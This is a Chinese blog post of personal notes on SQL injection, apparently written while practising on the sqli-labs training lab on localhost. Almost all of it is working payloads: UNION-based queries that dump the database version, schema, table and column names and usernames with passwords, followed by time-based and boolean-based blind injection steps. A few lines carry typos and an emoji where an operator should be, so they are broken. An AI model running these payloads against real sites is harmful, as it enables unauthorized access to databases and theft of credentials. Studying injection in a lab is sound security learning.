sql注入的方式

最新推荐文章于 2024-05-14 17:59:58 发布

记录笔记

最新推荐文章于 2024-05-14 17:59:58 发布

阅读量302

点赞数

文章标签： sql

本文链接：https://blog.csdn.net/wanghao200108/article/details/124108743

版权

二，求列数
http://127.0.0.1/sqli/sqli-labs-master/Less-1/?id=1%27%20order%20by%204%23
二分法
三、求显示位
实际为报错位
四、爆数据库版本号
id=-1’ union select 1,2,version() – +
五、爆当前数据库名
id=-1’ union select 1,2,database() --+
查询所有数据库 id=-1‘ union select 1,2,group_concat(schema_name) from information_schema.schemata – +

六、爆表名
id=-1’union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=‘security’-- +
七、爆列名
id=-1’union select 1,2,group_concat(column_name) from information_schema.columns where table_name=‘users’ – +
八、爆字段名
id=-1’union select 1,username,password from users where id=2 --+

时间型盲注
1.求数据库名长度
and if(length(database())=8,sleep(5),1) – -
2.求数据库名对应的ASCII值
and if(ascii(substr((select database()),1,1))=115,sleep(5),1) – -
3.求表的数量
and if((select count(*) from information_schema.tables where table_schema=‘security’)=4,sleep(5),1)-- -
4.求表名的长度
and if((select length(table_name) from information_schema.tables where table_shcema=‘secuity’ limit 0,1)=6,sleep(5),1) – -
5.求表名对应的ASCII值
and if(ascii(substr((select(table_name)from information_schema,tables where table_schema=‘security’ limit 0,1),1,1))=101,sleep(5),1)-- -
6.求列的数量
and if((select count(column_name)from information_schema.columns where table_schema=‘security’ and table_name=‘users’)=3,sleep(5),1)-- -
7.

布尔型盲注
1.求闭合字符
2.求数据库名长度
and length(database())=8 %23
3.求当前数据库名对应的ASCII值
and ascii(substr(database(),1,1))=115 %23
4.求表的数量
and (select count(table_name) from information_schema.tables where table_schema=‘security’)=4
%23
5.求表名的长度
and (select length(table_name) from information_schema.tables where table_schema=‘security’ limit 0,1)=6 %23
6.求表名对应的ASCII值
and ascii(substr((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),1,1))=101 %23
7.求列的数量
and (select count(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘users’)=3 %23
8.求列名的长度
and (select length(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘users’ limit 0,1)❤️ %23
9.求列名对应的ASCII值
and ascii(substr((select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘users’ limit 0,1),1,1))=105 %23
10.求字段的数量
and (select count(username) from security.users)=13 %23
11.求字段内容的长度
and (select length(username) from security.users limit 0,1)=4 %23
12.求字段对应的ASCII值
and ascii(substr((select concat(username,0x23,password) from security.users limit 0,1),1,1))=68 %23
在这里插入图片描述

记录笔记

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
sql注入的方式

二，求列数http://127.0.0.1/sqli/sqli-labs-master/Less-1/?id=1%27%20order%20by%204%23二分法三、求显示位实际为报错位四、爆数据库版本号id=-1’ union select 1,2,version() – +五、爆当前数据库名id=-1’ union select 1,2,database() --+查询所有数据库 id=-1‘ union select 1,2,group_concat(schema_name) fr
复制链接

扫一扫